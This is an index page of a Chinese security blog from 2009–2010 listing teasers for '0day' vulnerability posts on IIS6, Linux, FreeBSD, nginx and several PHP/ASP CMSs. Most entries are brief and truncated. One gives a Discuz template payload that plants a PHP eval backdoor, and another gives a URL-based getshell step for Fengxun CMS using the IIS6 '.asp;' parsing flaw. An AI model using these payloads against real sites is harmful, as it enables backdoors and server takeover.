DoDo's Blog

开拓安全环境,架构可信网络--关注网络安全

2010年4月3日

2010年3月底公布的,PDF最新0day

 There's a function within PDF specs to launch executables. Or to run JavaScript. Why do we need these things?

With specs like these, it's no wonder it takes ages for Adobe Reader to boot up and load all the plugins.

...
Tags: pdf 0day  
发布:DoDo | 分类:0day | 评论:0 | 引用:0 | 浏览:

2009年9月15日

nginx HTTP Request Remote Buffer Overflow Vulnerability

漏洞描述:

nginx容易引起缓冲区溢出漏洞,因为该应用程序没有对用户提交的数据进行边界检查,攻击者可以利用这个安全漏洞使得受影响的程序执行任意代码,如果代码执行失败,将导致拒绝服务。
 
利用代码:
暂未提供

...

Tags: nginx  远程溢出  
发布:DoDo | 分类:0day | 评论:0 | 引用:0 | 浏览:

2009年9月8日

IIS6.0文件名解析漏洞

IIS6.0对类似 xxxx.asp;xxx.jpg这样的文件会当成asp来解析,看图

 注意中间那个分号

Tags: iis6  上传漏洞  
发布:DoDo | 分类:0day | 评论:2 | 引用:0 | 浏览:

2009年9月1日

Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit

linux内核2.6-2.6.19本地提权

Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit

Tags: 溢出  linux  0day  
发布:DoDo | 分类:0day | 评论:0 | 引用:0 | 浏览:

2009年9月1日

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit

微软IIS5.6/6.0 FTP服务器远程栈溢出

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit

Tags: IIS远程溢出  
发布:DoDo | 分类:0day | 评论:0 | 引用:0 | 浏览:

2009年8月28日

dedecms最新注入漏洞影响版本5.3-5.5

...

Tags: dedecms  注入漏洞  5.3-5.5  
发布:DoDo | 分类:0day | 评论:1 | 引用:0 | 浏览:

2009年8月25日

FreeBSD<=6.1本地提权(kqueue() NULL pointer Dereference Local Root Exploit )

FreeBSD <= 6.1 suffers from classical check/use race condition on SMP
systems in kevent() syscall, leading to kernel mode NULL pointer
dereference. It can be triggered by spawning two threads:
1st thread looping on open() and close() syscalls, and the 2nd thread
...

Tags: FreeBSD  本地提权  
发布:DoDo | 分类:0day | 评论:0 | 引用:0 | 浏览:

2009年8月21日

Discuz所有版本后台提权漏洞(补丁)

利用方法

自定义模板变量:
变 量 :

{’,”);ECHO ”;$X=SUBSTR(MD5($_GET['B']),28);IF($X==’7aaa’)EVAL($_POST['A']);//}

...

Tags: discuz漏洞  discuz 0day  
发布:DoDo | 分类:0day | 评论:0 | 引用:0 | 浏览:

2009年8月16日

最新linux高危漏洞发布(Linux Kernel 'sock_sendpage()' NULL Pointer Dereference Vulnerability)

 

在微软本月月经日(8.11)的同一天,国外黑客taviso和julien公开了可以攻击所有新旧Linux系统的一个漏洞,包括但不限于 RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。黑客只需要执行 一个命令,就可以通过此漏洞获得root权限,即使开启了SELinux也于事无补。攻击这个漏洞到底有多简单,下面我们看图说话,有图有真相。

http://www.sectop.com/upload/2009/8/200908161153001552.zip
...

Tags: linux内核溢出  linux高危漏洞  
发布:DoDo | 分类:0day | 评论:2 | 引用:0 | 浏览:

2009年7月15日

风讯 4.0 SP7 getshell 0day

影响版本:<=4.0 sp7,前面的版本没去看,估计也能日。
利用条件,开启了文件上传功能,iis6环境。

漏洞描述:建立目录的地方,名称过滤上有失误,导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.bbb.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/06150583700/aaa.asp//&CurrPath=/userfiles/06150583700
...

Tags: 风讯0day  
发布:DoDo | 分类:0day | 评论:3 | 引用:0 | 浏览:
分页:[«]1[2][»]

Powered By DoDo

Copyright 2008-2009 Sectop.com(鄂ICP备08007762号) All Rights Reserved.